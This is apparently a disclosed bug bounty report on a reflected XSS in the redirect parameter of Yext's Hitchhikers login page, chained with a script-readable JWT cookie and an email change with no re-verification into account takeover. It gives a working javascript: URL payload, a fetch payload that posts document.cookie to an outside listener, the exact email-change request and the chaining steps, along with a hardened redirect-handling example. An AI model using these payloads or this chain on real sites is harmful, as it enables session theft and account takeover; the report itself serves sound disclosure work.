Yext -- Account Takeover on Yext via Reflected XSS on https://hitchhikers.yext.com/login via `redirect` parameter

 Company Information : 



Yext is a New York-based online marketing and search company. It offers brand updates using its cloud-based network of apps, search engines and other facilities. The company was founded in 2006 by Howard Lerman, Brian Distelburger, and Brent Metz. Its 2021 market cap was $2.0 billion and revenue was $354.7 million.


Bug Category : 

Cross-site-scripting (XSS) :
Cross-site scripting (XSS) is an attack in which an attacker injects malicious executable scripts into the code of a trusted application or website. Attackers often initiate an XSS attack by sending a malicious link to a user and enticing the user to click it.



Target  Information : 

https://www.yext.com/index.html


Technical Details of the Bug : 

Several bugs chain together to take over any Hitchhikers account. Each bug is described on its own first, and then the bugs are chained into the account takeover (ATO).

Description :

Reflected XSS :

There is a reflected XSS on the login page which also fires in an authenticated session: the `redirect` parameter is used as a navigation target without the `javascript:` scheme being rejected, so a `javascript:` URL runs in the page's origin. https://hitchhikers.yext.com/login?redirect=javascript%3Aalert%28document.cookie%29
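To make the root cause concrete, here is an added example (not Yext's code) of the unsafe way a login page can honour a `redirect` parameter, beside a hardened version. The origin constant, the function names and the fallback path are assumptions for illustration.

```javascript
// Added example, not Yext's code: unsafe vs. hardened handling of a
// post-login `redirect` parameter. Origin and names are assumed.
const SITE_ORIGIN = "https://hitchhikers.yext.com"; // assumed: the app's own origin

// Vulnerable pattern: the parameter becomes the navigation target as-is.
// A `javascript:` URL is then executed in the page's origin, which is what
// ?redirect=javascript:alert(document.cookie) exploits.
function vulnerableRedirectTarget(redirectParam, fallback = "/") {
  return redirectParam ? redirectParam : fallback;
}

// Hardened pattern: resolve the value against the app's origin, accept only
// https on that exact origin, and return a path rather than the raw input.
function safeRedirectTarget(redirectParam, fallback = "/") {
  if (typeof redirectParam !== "string" || redirectParam.trim() === "") return fallback;
  let url;
  try {
    url = new URL(redirectParam, SITE_ORIGIN); // relative paths resolve onto SITE_ORIGIN
  } catch {
    return fallback; // unparseable input
  }
  // Rejects javascript:, data:, vbscript: and anything else that is not https.
  if (url.protocol !== "https:") return fallback;
  // Rejects open redirects: //evil.example, https://evil.example, and the
  // backslash form /\evil.example, which the WHATWG parser reads as an authority.
  if (url.origin !== SITE_ORIGIN) return fallback;
  return url.pathname + url.search + url.hash;
}
```

The origin comparison after parsing is the part that matters. A prefix check such as `startsWith("/")` passes `/\evil.example`, and a scheme check on the raw string passes `java\tscript:`, because the URL parser strips tabs and newlines before it reads the scheme.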

Steal JWT Token in cookies :

The JWT that authenticates the Hitchhikers account and its APIs is stored in a cookie that page script can read (the `document.cookie` payload above returns it, so the cookie is not HttpOnly). The XSS can therefore steal the token.

No extra protection on email change :

The email change request asks for no additional verification such as the current password, so anyone holding the JWT can change the account email with a single request. The vulnerable request is shown below under "Vulnerable HTTP request of email change".


Chaining the attack Steps:

1. Log in to the victim account.
2. Trigger the XSS in the victim's session and copy the cookies.
3. Extract the JWT from the cookies.
4. Send the email change request with the captured JWT, setting the email to the attacker's address.
5. The confirmation for the new email is delivered to the attacker's inbox.
6. Confirm the email, then request a password reset for the new address.
7. Change the password.
8. The victim's account now carries the attacker's email and password, and the victim cannot recover it.

New payload to steal JWT token/Cookie :

payload : javascript%3Afetch(%27https%3A%2F%2F[BURP_Collaborator]%27%2C%20%7B%0Amethod%3A%20%27POST%27%2C%0Amode%3A%20%27no-cors%27%2C%0Abody%3Adocument.cookie%0A%7D)%3B

Decoded, the payload is:

javascript:fetch('https://[BURP_Collaborator]', {
method: 'POST',
mode: 'no-cors',
body:document.cookie
});

The PoC uses Burp Collaborator as the listener. The reference code is in the PortSwigger article below; open its solution to see how the fetch call posts the cookie to your own server. https://portswigger.net/web-security/cross-site-scripting/exploiting/lab-stealing-cookies



Once the attacker has the JWT, every further step runs from the attacker's side with no victim interaction. With the captured JWT the attacker sends the email change request shown below, and the victim's email is changed.

Vulnerable HTTP request of email change :

PUT /hitchhikerusers/user HTTP/1.1
Host: sandbox.yext.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:75.0) Gecko/20100101 Firefox/75.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://hitchhikers.yext.com/profile/settings/general/
X-Use-Cookie: 1
Content-Type: application/json
Authorization: Bearer TOKEN
Origin: https://hitchhikers.yext.com
Content-Length: 44
Connection: close

{"email":""}


Put the captured token in place of TOKEN and send the request with the new email; the victim's email is changed.
The attacker then verifies the new email address and resets the password for a full account takeover.

Impact : 

Complete account takeover of any account on https://hitchhikers.yext.com by chaining multiple bugs.


Timeline : 

Oct 1st 2020: Report sent to the Yext product security team through HackerOne.

Oct 27th 2020: Report accepted and triaged.

Nov 2nd 2020: Issue fully resolved and confirmed.

Nov 20th 2020: $2,000 bounty awarded.
